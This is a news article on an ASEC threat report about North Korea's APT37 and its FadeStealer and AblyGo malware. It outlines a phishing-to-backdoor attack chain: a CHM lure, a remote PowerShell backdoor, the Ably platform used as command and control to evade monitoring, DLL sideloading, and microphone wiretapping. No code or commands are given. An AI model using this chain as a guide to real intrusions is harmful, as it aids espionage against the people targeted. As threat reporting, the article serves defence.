The North Korean APT37 hacking group uses a new ‘FadeStealer’ information-stealing malware containing a ‘wiretapping’ feature, allowing the threat actor to snoop and record from victims’ microphones.
APT37, also known as StarCruft, Reaper, or RedEyes, is believed to be a state-sponsored hacking group with a long history of conducting cyber espionage attacks aligned with North Korean interests. These attacks target North Korean defectors, educational institutions, and EU-based organizations.
In the past, the hackers were known to utilize custom malware called ‘Dolphin’ and ‘M2RAT’ to execute commands and steal data, credentials, and screenshots from Windows devices and even connected mobile phones.
It starts with a CHM file
In a new report from the AhnLab Security Emergency Response Center (ASEC), researchers provide information on new custom malware dubbed ‘AblyGo backdoor’ and ‘FadeStealer’ that the threat actors use in cyber espionage attacks.
The malware is believed to be delivered using phishing emails with attached archives containing password-protected Word and Hangul Word Processor documents (.docx and .hwp files) and a ‘password.chm’ Windows CHM file.
ASEC believes that the phishing emails instruct the recipient to open the CHM file to obtain the password for the documents, which begins the infection process on the Windows device.
Once the CHM file is opened, it will display the alleged password to open the document but also quietly downloads and executes a remote PowerShell script that contains backdoor functionality and is registered to autostart with Windows.
This PowerShell backdoor communicates with the attackers’ command and control servers and executes any commands sent by the attackers.
The backdoor is used to deploy an additional GoLang backdoor used in the later stages of the attack to conduct privilege escalation, data theft, and the delivery of further malware.
This new backdoor is named ‘AblyGo backdoor,’ as it uses the Ably Platform, an API service that allows developers to deploy real-time features and information delivery in their applications.
The threat actors use ABLY as a command and control platform to send base64-encoded commands to the backdoor to execute and then to receive any output, where the threat actors later retrieve it.
As this is a legitimate platform, it is likely used by the threat actors to evade network monitoring and security software.
ASEC gained access to the Ably API key used by the backdoor and could monitor some of the commands issued by the attackers. These commands illustrated how the hackers used the backdoor to list the files in a directory, rename a fake .jpg file to an .exe file, and then execute it.
However, it is technically possible for the threat actor to send any command they wish to execute.
FadeStealer wiretaps your device
Ultimately, the backdoors deploy a final payload in the form of ‘FadeStealer,’ an information-stealing malware capable of stealing a wide variety of information from Windows devices.
When installed, FadeStealer is injected using DLL sideloading into the legitimate Internet Explorer ‘ieinstall.exe’ process and begins stealing data from the device and storing them in RAR archives every 30 minutes.
The data includes screenshots, logged keystrokes, files collected from connected smartphones, and removable devices. The malware also includes the ability to record audio from a connected microphone, enabling the threat actors to listen in on conversations.
This data is collected in the following %Temp% folders:
|Folder Path||Exfiltrated Data|
|%temp%\VSTelems_FadeIn||Data collection of smartphone device|
|%temp%\VSTelems_FadeOut||Removable media device|
The threat actors can then analyze this collected data to steal sensitive information for use by the North Korean government or conduct further attacks.
APT37 is not the only North Korean threat actor utilizing CHM files to deploy malware.
ASEC also reported today that the Kimsuky state-sponsored hacking group is utilizing CHM files in phishing attacks to deploy malicious scripts that steal user information and install additional malware.
“If you examine the overall attack flow in this case, the threat actor carried out their attack cleverly and precisely by employing spear phishing emails to gain access to target systems and using an Ably channel as a command-and-control server,” concluded the researchers.
“These sorts of attacks are difficult for individuals to notice.”